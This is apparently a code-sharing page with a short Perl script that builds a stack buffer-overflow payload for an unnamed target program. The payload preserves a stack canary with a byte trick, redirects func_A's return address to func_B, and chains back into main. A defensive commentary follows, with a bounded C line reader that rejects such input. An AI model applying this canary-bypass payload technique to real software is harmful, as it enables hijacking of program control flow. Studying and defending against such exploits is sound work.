Created
February 20, 2014 20:38
Some binary exploit :)
#!/usr/bin/env perl
print "a" x 32; # fill the gap up to the canary
print "Z"."\x45\x8b\x6b"; # keep the canary unchanged, but use a temporary byte in place of its zero byte so the C string continues in memory
print "b" x 12; # fill another gap
print "\x5b\x85\x04\x08"; # overwrite func_A()'s return address (into the body of main()) with the beginning of func_B()
print "\xd3\x94\xe1\xf7"; # set func_B()'s return address equal to main()'s
print "\n"; # return from the first gets() call and wait for another one
print "c" x 32; # replace the temporary byte standing in for the canary's zero byte with a real zero (the NUL that gets() appends)
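The script relies on two unbounded gets() calls into a buffer that its filler lengths suggest is 32 bytes. As an added example (not code from the gist or from the target program, which the page does not show), this bounded reader rejects both lines, including the second one, whose 32 characters only fit if the terminating NUL lands one byte past the buffer. `BUF_CAP`, `read_line` and `status_of_line` are hypothetical names, and the guard bytes and inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

enum { BUF_CAP = 32 };  /* assumed: matches the 32-byte filler in the script */
enum { LINE_OK, LINE_TOO_LONG, LINE_EOF };

/* Read one line into buf (cap bytes including the NUL). Bytes that do not
 * fit are consumed and dropped, and the line is rejected, so neither the
 * data nor the terminating NUL is ever stored at buf[cap] or beyond. */
static int read_line(char *buf, size_t cap, FILE *in)
{
    size_t n = 0;
    int c, too_long = 0;

    if (cap == 0)
        return LINE_TOO_LONG;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n + 1 < cap)
            buf[n++] = (char)c;
        else
            too_long = 1;          /* keep draining the line, store nothing */
    }
    buf[too_long ? 0 : n] = '\0';
    if (too_long)
        return LINE_TOO_LONG;
    return (c == EOF && n == 0) ? LINE_EOF : LINE_OK;
}

/* Constructed harness: feed `input` through a temp file, read `which + 1`
 * lines, and return the last status, or -1 if the temp file could not be
 * created or the guard bytes placed after the buffer were modified. */
static int status_of_line(const char *input, int which)
{
    struct { char buf[BUF_CAP]; char guard[4]; } frame;
    FILE *f = tmpfile();
    int st = LINE_EOF;

    if (f == NULL)
        return -1;
    memcpy(frame.guard, "GRD", 4);
    fputs(input, f);
    rewind(f);
    for (int i = 0; i <= which; i++)
        st = read_line(frame.buf, sizeof frame.buf, f);
    fclose(f);
    return memcmp(frame.guard, "GRD", 4) == 0 ? st : -1;
}
```

A 32-byte buffer holds at most 31 characters plus the NUL, so a reader sized this way treats an exactly-32-character line as an overflow instead of letting the terminator spill into the adjacent bytes.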